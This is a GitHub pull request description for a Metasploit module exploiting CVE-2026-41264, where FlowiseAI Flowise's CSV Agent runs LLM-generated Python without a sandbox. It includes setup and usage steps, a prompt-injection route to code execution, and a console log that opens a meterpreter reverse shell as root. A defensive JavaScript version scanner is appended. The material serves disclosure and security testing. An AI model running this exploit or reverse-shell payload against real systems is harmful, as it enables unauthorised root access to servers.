
Add Flowise CSV Agent Prompt Injection RCE module (CVE-2026-41264)#21407

Open
Takahiro-Yoko wants to merge 1 commit into rapid7:master from Takahiro-Yoko:flowise_auth_rce_cve_2026_41264


@Takahiro-Yoko
Contributor

CVE-2026-41264
GHSA-3hjv-c53m-58jj

Vulnerable Application

This vulnerability allows remote attackers to execute arbitrary code on affected installations of FlowiseAI Flowise.
Authentication is not required to exploit this vulnerability.

The specific flaw exists within the run method of the CSV_Agents class.
The issue results from the lack of proper sandboxing when evaluating an LLM-generated Python script.
An attacker can leverage this vulnerability to execute code in the context of the user running the server.

The vulnerability affects:

* flowise <= 3.0.13
* flowise-components <= 3.0.13

This module was successfully tested on:

* flowise 3.0.13 installed with Docker

Installation

  1. docker run --name flowise -p 3000:3000 flowiseai/flowise:3.0.13

  2. On an attacker machine

curl -fsSL https://ollama.com/install.sh | sh
ollama run llama3.1

  3. Create API Key (need chatflows:create permission for exploit to work)

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: use exploit/multi/http/flowise_auth_rce_cve_2026_41264.rb
  4. Do: run lhost=<lhost> rhost=<rhost> apikey=<apikey> ollamaapiuri=<ollamaapiuri> model=<model>
  5. You should get a meterpreter

Scenarios

cmd/linux/http/x64/meterpreter_reverse_tcp

msf > use exploit/multi/http/flowise_auth_rce_cve_2026_41264.rb
[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp
msf exploit(multi/http/flowise_auth_rce_cve_2026_41264) > run apikey=<apikey> rhost=192.168.56.17 lhost=192.168.56.1 ollamaapiuri=http://192.168.56.1:11434  model=llama3.1
[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Flowise version 3.0.13 detected
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.17:33468) at 2026-05-05 14:09:24 +0900

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : acc229b14e46
OS           :  (Linux 6.8.0-52-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 
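
For checking a deployment against the affected versions listed in this pull request, here is an added example (not part of the module or the PR, and not Flowise's own code). It scans a parsed npm package-lock.json (lockfile v2/v3 `packages` map) for flowise and flowise-components at or below 3.0.13; the function names and the sample lockfile are assumptions made for illustration.

```javascript
// Added example: upper bounds taken from the PR description (<= 3.0.13).
const AFFECTED_MAX = new Map([['flowise', '3.0.13'], ['flowise-components', '3.0.13']]);

// Parse "MAJOR.MINOR.PATCH" with optional prerelease/build suffix; null if malformed.
function parseVersion(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)(?:-[0-9A-Za-z.-]+)?(?:\+[0-9A-Za-z.-]+)?$/.exec(String(v).trim());
  return m ? [Number(m[1]), Number(m[2]), Number(m[3])] : null;
}

// True when core version a <= b. A prerelease of X sorts before X, so comparing
// cores only is correct for an inclusive upper bound that has no prerelease tag.
function atOrBelow(a, b) {
  for (let i = 0; i < 3; i++) {
    if (a[i] !== b[i]) return a[i] < b[i];
  }
  return true;
}

// Walk the lockfile v2/v3 "packages" map, including nested node_modules copies.
function findAffected(lock) {
  const findings = [];
  for (const [path, meta] of Object.entries(lock.packages || {})) {
    const name = meta.name || path.split('node_modules/').pop();
    if (!AFFECTED_MAX.has(name)) continue;
    const ver = parseVersion(meta.version);
    const max = parseVersion(AFFECTED_MAX.get(name));
    if (ver === null) {
      findings.push({ path, name, version: meta.version, status: 'unparseable' });
    } else if (atOrBelow(ver, max)) {
      findings.push({ path, name, version: meta.version, status: 'affected' });
    }
  }
  return findings;
}

// Constructed sample lockfile; versions chosen only to exercise the comparison.
const sampleLock = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'my-flowise-deploy', version: '1.0.0' },
    'node_modules/flowise': { version: '3.0.13' },
    'node_modules/flowise/node_modules/flowise-components': { version: '3.0.12-rc.1' },
    'node_modules/flowise-components': { version: '3.0.14' },
    'node_modules/flowise-embed': { version: '3.0.5' },
  },
};
console.log(findAffected(sampleLock));
```

Entries reported as `unparseable` (for example link entries or tags instead of versions) need a manual look rather than being treated as outside the range.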
